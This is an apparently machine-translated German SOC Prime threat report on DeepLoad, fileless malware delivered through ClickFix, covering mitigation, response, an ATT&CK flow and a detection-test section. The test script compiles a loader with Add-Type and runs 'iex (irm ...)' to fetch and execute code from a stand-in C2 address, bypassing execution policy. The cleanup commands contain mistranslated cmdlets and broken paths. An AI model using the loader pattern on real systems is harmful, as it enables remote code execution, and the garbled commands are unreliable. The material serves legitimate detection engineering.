SOC Prime Bias: Medium

07 Apr. 2026 18:16
newspaper icon ReliaQuest

DeepLoad-Malware kombiniert ClickFix-Übermittlung mit KI-generierter Umgehung

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
DeepLoad-Malware kombiniert ClickFix-Übermittlung mit KI-generierter Umgehung
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

DeepLoad ist eine Dateilos-Malware-Familie, die durch ClickFix-Sozialengineering verbreitet wird. Sie basiert auf einem verschleierten PowerShell-Loader, speicherinterner Shellcode-Injektion in vertrauenswürdige Windows-Prozesse und auf KI-generiertem „Rauschen“, um die Erkennungsgenauigkeit statischer Analysen zu reduzieren. Der Loader stellt Persistenz durch eine geplante Aufgabe und WMI-Ereignisabonnements her, kann sich über USB-Medien verbreiten und stiehlt Anmeldedaten über sowohl eine zwielichtige Browsererweiterung als auch eine begleitende Datei manager.exe-Komponente.

Untersuchung

Der Bericht beschreibt den anfänglichen Zugriff beginnend mit einem vom Opfer ausgeführten PowerShell-Befehl, gefolgt von der Loader-Abrufung über mshta.exe. Der Loader verwendet Add-Type, um zur Laufzeit eine temporäre DLL zu erzeugen und injiziert dann Shellcode in LockAppHost.exe mittels APC-Injektion. Die Persistenz wird durch eine geplante Aufgabe und ein verstecktes WMI-Ereignisabonnement aufrechterhalten, das eine erneute Infektion selbst nach Bereinigung wiederherstellen kann, mit einem festgestellten Verzögerungsfenster von etwa drei Tagen. Der Anmeldeinformationsdiebstahl wird dateimanager.exe zugeschrieben, zusammen mit einer bösartigen Browsererweiterung, die parallel arbeitet.

Minderung

Aktivieren PowerShell Script Block Logging und alarmieren bei verdächtigen PowerShell-Ausführungsabläufen. Überwachen Sie ausgehende Netzwerkaktivitäten von mshta.exe, beobachten Sie die Erstellung unerwarteter geplanter Aufgaben und detektieren Sie anomale QueueUserAPC-Nutzungen, die auf APC-Injektionen hindeuten. Während der Behebung sollten WMI-Ereignisabonnements explizit aufgelistet und entfernt werden, anstatt sich nur auf Datei-/Registry-Bereinigungen zu verlassen. Drehen Sie exponierte Anmeldedaten und entfernen Sie nicht autorisierte Browser-Erweiterungen, um Pfade für Anmeldeinformationsdiebstahl zu unterbrechen.

Reaktion

Wenn DeepLoad-Aktivitäten erkannt werden, isolieren Sie den Host, stoppen Sie bösartige PowerShell-Aktivitäten und beenden Sie alle injizierten Prozesse. Entfernen Sie die geplante Aufgabe und löschen Sie das zugehörige WMI-Abonnement, dann beseitigen Sie filemanager.exe und die bösartige Browsererweiterung. Drehen Sie alle potenziell kompromittierten Anmeldedaten, desinfizieren Sie alle angeschlossenen USB-Medien und überprüfen Sie das System auf Reste von Injektionsartefakten, bevor Sie es wieder in Betrieb nehmen.

Keywords: DeepLoad, ClickFix, dateilos Malware, PowerShell-Loader, mshta.exe, Add-Type, speicherinterner Shellcode, APC-Injektion, QueueUserAPC, LockAppHost.exe, geplante Aufgabenpersistenz, WMI-Ereignisabonnement, USB-Verbreitung, bösartige Browsererweiterung, Anmeldediebstahl.

"graph TB %% Klassendefinitionen classDef action fill:#99ccff %% Knotendefinitionen step_user_exec["<b>Aktion</b> – <b>T1204.004 Benutzer-Ausführung: Bösartiges Kopieren & Einfügen</b><br/>Opfer führt PowerShell-Befehl über ClickFix aus."] class step_user_exec action step_powershell["<b>Aktion</b> – <b>T1059.001 Befehl und Skriptinterpreter: PowerShell</b><br/>Lädt Loader mit Invokeu2011Expression (IEX) herunter."] class step_powershell action step_mshta["<b>Aktion</b> – <b>T1218.005 System-Binär-Proxy-Ausführung: Mshta</b><br/>mshta.exe ruft ein entferntes Skript ab."] class step_mshta action step_schtask["<b>Aktion</b> – <b>T1053 Geplante Aufgabe/Job</b><br/>Erstellt Persistenz-Aufgabe zur erneuten Ausführung des Loaders."] class step_schtask action step_injection["<b>Aktion</b> – <b>T1055.004 Prozess-Injektion: Asynchroner Prozeduraufruf</b><br/>Injiziert Shellcode in LockAppHost.exe."] class step_injection action step_reflective["<b>Aktion</b> – <b>T1620 Reflektiertes Code-Laden</b><br/>Kompiliert in-Memory-DLL über Addu2011Type."] class step_reflective action step_masquerade["<b>Aktion</b> – <b>T1036.003 Verschleierung: Legitimen Dienstprogramm umbenennen</b><br/>Verwendet filemanager.exe und .lnk-Verknüpfungen."] class step_masquerade action step_removable["<b>Aktion</b> – <b>T1091 Replikation über Wechselmedien / T1080 Vergiftung verteilter Inhalte</b><br/>Legt bösartige Verknüpfungen auf USB-Laufwerken ab."] class step_removable action step_wmi["<b>Aktion</b> – <b>T1546.003 Ereignisgesteuerte Ausführung: WMI-Ereignisabonnement</b><br/>Persistiert und führt nach Cleanup erneut aus."] class step_wmi action step_keylog["<b>Aktion</b> – <b>T1056.001 Eingaben erfassen: Keylogging</b><br/>Erfasst Tastendrucke für Anmeldedaten."] class step_keylog action step_cred["<b>Aktion</b> – <b>T1555.003 Anmeldedaten aus Web-Browsern / T1176 Softwareerweiterungen</b><br/>Die bösartige Browsererweiterung stiehlt gespeicherte Passwörter."] class step_cred action step_valid["<b>Aktion</b> – <b>T1078 Gültige Konten</b><br/>Angreifer verwendet erbeutete Anmeldedaten."] class step_valid action step_c2["<b>Aktion</b> – <b>T1102.002 Bidirektionale Webdienstkommunikation / T1102.003 Einu2011Wege</b><br/>C2-Kanal und Exfiltration."] class step_c2 action %% Verbindungen step_user_exec –>|auslösen| step_powershell step_powershell –>|lädt herunter über| step_mshta step_mshta –>|ausführt| step_schtask step_schtask –>|erstellt| step_injection step_injection –>|injiziert in| step_reflective step_reflective –>|lädt| step_masquerade step_masquerade –>|legt Verknüpfungen auf| step_removable step_removable –>|ermöglicht| step_wmi step_wmi –>|aktiviert| step_keylog step_keylog –>|erfasst Anmeldedaten für| step_cred step_cred –>|stellt bereit| step_valid step_valid –>|ermöglicht| step_c2 "

Angriffsablauf

Simulationsausführung

Voraussetzung: Der Telemetrie- & Baseline-Pre-Flight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Beschreibungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffsbericht & Befehle:

    1. Erste Fußfassung: Der Angreifer hat eine niedrig privilegierte PowerShell-Session auf dem Opfer-Host.
    2. Umgehen der Ausführungsrichtlinie: Sie rufen PowerShell auf mit -ep Bypass um alle Skript-Ausführungsbeschränkungen zu ignorieren.
    3. .NET-Payload kompilieren: Mit Add-Typebinden sie eine kleine C#-Klasse ein, die bei Instanziierung eine Webanfrage an den C2-Server durchführt (http://10.0.0.5:3015/index).
    4. Remote-Skript herunterladen & ausführen: Der Angreifer leitet das Ergebnis von irm (Invoke‑RestMethod) in iexein, um das bösartige Skript im Speicher auszuführen.
    5. Ergebnis-Telemetrie: Die vom Betriebssystem aufgezeichnete Befehlszeile enthält die drei erforderlichen Zeichenfolgen (-ep Bypass, Add-Type, iex(irm http://…:3015/index)) und erfüllt damit die Sigma-Regel.

  • Regressionstest-Skript:

    # DeepLoad-ähnliche bösartige Ausführung
# Dieses Skript reproduziert das genaue Befehlsmuster, das erforderlich ist, um die Sigma-Regel zu aktivieren.
$c2 = "http://10.0.0.5:3015/index"
$payload = @"
using System;
using System.Net;
public class Loader {
public static void Run() {
    new WebClient().DownloadString(""$c2"");
}
}
"@
# PowerShell mit dem Bypass-Flag aufrufen, das Payload kompilieren und dann Remote-Skript ausführen
powershell -NoProfile -ExecutionPolicy Bypass -Command `
    "Add-Type -TypeDefinition `$payload; `
     iex (irm $c2)"

  • Aufräumbefehle:

    # Entfernen Sie alle temporären Dateien oder geladenen Assemblies (falls vorhanden)
Entfernen-Element -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue
# Optional: Löschen Sie das PowerShell-Transkript (falls aktiviert)
Clear-Host

Ende des Berichts

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten